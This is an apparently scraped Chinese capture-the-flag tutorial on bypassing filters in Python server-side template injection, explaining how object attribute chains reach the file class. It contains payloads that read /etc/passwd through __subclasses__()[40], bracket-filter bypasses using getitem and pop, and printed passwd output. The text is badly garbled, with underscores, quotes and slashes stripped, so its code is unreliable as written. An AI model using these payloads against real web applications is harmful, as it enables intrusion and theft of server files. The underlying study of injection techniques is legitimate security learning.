CTFSSTI（服务器模板注入）绕过

　　过滤〔〕绕过绕过姿势getitem绕过〔〕｛｛。class。mro。getitem（2）。subclasses（）。getitem（40）（etcpasswd）。read（）｝｝｛｛。class。mro。getitem（2）。subclasses（）。pop（40）（etcpasswd）。read（）｝｝python魔术方法payload：。class。mro〔2〕。subclasses（）〔40〕。read（）。class。mro〔2〕。subclasses（）〔40〕（etcpasswd）。read（）其实就是通过一个对象找到另一个对象，这里通过一个字符串对象，找了一个文件对象，然后初始化，读取获得一个字符串实例获得字符串的type实例。classtypestr获得其父类。class。mro（typestr，typebasestring，typeobject）获得父类中的object类。class。mro〔2〕typeobject获得object类的子类，但发现这个subclasses属性是个方法。class。mro〔2〕。subclassesbuiltinmethodsubclassesoftypeobjectat0x10376d320使用subclasses（）方法，获得object类的子类。class。mro〔2〕。subclasses（）〔typetype，typeweakref，typeweakcallableproxy，typeweakproxy，typeint，typebasestring，typebytearray，typelist，typeNoneType，typeNotImplementedType，typetraceback，typesuper，typexrange，typedict，typeset，typeslice，typestaticmethod，typecomplex，typefloat，typebuffer，typelong，typefrozenset，typeproperty，typememoryview，typetuple，typeenumerate，typereversed，typecode，typeframe，typebuiltinfunctionormethod，typeinstancemethod，typefunction，typeclassobj，typedictproxy，typegenerator，typegetsetdescriptor，typewrapperdescriptor，typeinstance，typeellipsis，typememberdescriptor，typefile，typePyCapsule，typecell，typecallableiterator，typeiterator，typesys。longinfo，typesys。floatinfo，typeEncodingMap，typefieldnameiterator，typeformatteriterator，typesys。versioninfo，typesys。flags，typeexceptions。BaseException，typemodule，typeimp。NullImporter，typezipimport。zipimporter，typeposix。statresult，typeposix。statvfsresult，classwarnings。WarningMessage，classwarnings。catchwarnings，classweakrefset。IterationGuard，classweakrefset。WeakSet，classabcoll。Hashable，typeclassmethod，classabcoll。Iterable，classabcoll。Sized，classabcoll。Container，classabcoll。Callable，typedictkeys，typedictitems，typedictvalues，classsite。Printer，classsite。Helper，typesre。SREPattern，typesre。SREMatch，typesre。SREScanner，classsite。Quitter，classcodecs。IncrementalEncoder，classcodecs。IncrementalDecoder〕获得第40个子类的一个实例，即一个file实例。class。mro〔2〕。subclasses（）〔40〕typefile对file初始化。class。mro〔2〕。subclasses（）〔40〕（etcpasswd）openfileetcpasswd，moderat0x10397a8a0使用file的read属性读取，但发现是个方法。class。mro〔2〕。subclasses（）〔40〕（etcpasswd）。readbuiltinmethodreadoffileobjectat0x10397a5d0使用read（）方法读取。class。mro〔2〕。subclasses（）〔40〕（etcpasswd）。read（）nobody：：2：2：UnprivilegedUser：varempty：usrbinfalseroot：：0：0：SystemAdministrator：varroot：binsh变量类型判断方法问1：怎么知道subclasses是一个方法，而不是一个直接可以返回数组的变量呢？我又怎么知道什么类有什么方法或者属性呢？比如我如何知道应该用mro属性去找父类？而mro是什么类的成员方法？？答：首先subclasses是方法还是属性可以根据提示来判断如：。class。mro〔2〕。subclassesbuiltinmethodsubclassesoftypeobjectat0x10376d320另外，python中有一个内置函数是dir（），可以用这个函数来查看传入参数的成员方法以及属性C：UsersmokepythonPython3。9。12（tagsv3。9。12：b28265d，Mar232022，23：52：46）〔MSCv。192964bit（AMD64）〕onwin32Typehelp，copyright，creditsorlicenseformoreinformation。。classclassstrdir（）〔add，class，contains，delattr，dir，doc，eq，format，ge，getattribute，getitem，getnewargs，gt，hash，init，initsubclass，iter，le，len，lt，mod，mul，ne，new，reduce，reduceex，repr，rmod，rmul，setattr，sizeof，str，subclasshook，capitalize，casefold，center，count，encode，endswith，expandtabs，find，format，formatmap，index，isalnum，isalpha，isascii，isdecimal，isdigit，isidentifier，islower，isnumeric，isprintable，isspace，istitle，isupper，join，ljust，lower，lstrip，maketrans，partition，removeprefix，removesuffix，replace，rfind，rindex，rjust，rpartition，rsplit，rstrip，split，splitlines，startswith，strip，swapcase，title，translate，upper，zfill〕在Python的世界中：object是父子关系的顶端，所有的数据类型的父类都是它type是类型实例关系的顶端，所有对象都是它的实例的object和type都既是类又是实例object是type的一个实例type是object的子类验证class与base属性class属性可以沿着实例这条链往上走一个base属性可以沿着父子类关系这个条链往上走一个。classtypestr。class。classtypetype。class。class。basetypeobject。class。class。base。classtypetype可见之前的结论：object是type的一个实例，type是object的子类dir（。class。class）〔abstractmethods，base，bases，basicsize，call，class，delattr，dict，dictoffset，doc，eq，flags，format，ge，getattribute，gt，hash，init，instancecheck，itemsize，le，lt，module，mro，name，ne，new，reduce，reduceex，repr，setattr，sizeof，str，subclasscheck，subclasses，subclasshook，weakrefoffset，mro〕dir（type（。class））〔abstractmethods，base，bases，basicsize，call，class，delattr，dict，dictoffset，doc，eq，flags，format，ge，getattribute，gt，hash，init，instancecheck，itemsize，le，lt，module，mro，name，ne，new，reduce，reduceex，repr，setattr，sizeof，str，subclasscheck，subclasses，subclasshook，weakrefoffset，mro〕这个里有base，class，subclasses，mro，原来这些玩意都在这里，也就是说这几个属性，只要是type实例应该都有。回头再看。class。mro〔2〕。subclasses（）〔40〕（etcpasswd）。read（）通过。class获得一个typestr的实例typestr是typetype的一个实例，可用typetype的mro属性获得其父类的顶端typeobjecttypeobject是typetype的一个实例，可用typetype的subclasses（）函数获得object的所有子类找到第40个子类是文件，然后初始化调用读取方法即可非得用mro么我们看到，我们无非是要找到type‘object’然后调用subclasses（）函数，因为object是父类的顶端，也即是用base到顶，所以如下方式均可成功：。class。base。base。subclasses（）〔40〕（etcpasswd）。read（）type（。class）。base。subclasses（）〔40〕（etcpasswd）。read（）总结dict保存类实例或对象实例的属性变量键值对字典class返回类型所属的对象mro返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。bases返回该对象所继承的基类base和mro都是用来寻找基类的subclasses每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表init类的初始化方法globals对包含函数全局变量的字典的引用参考借鉴其它几种绕过https：www。cnblogs。com20175211lyzp11425368。html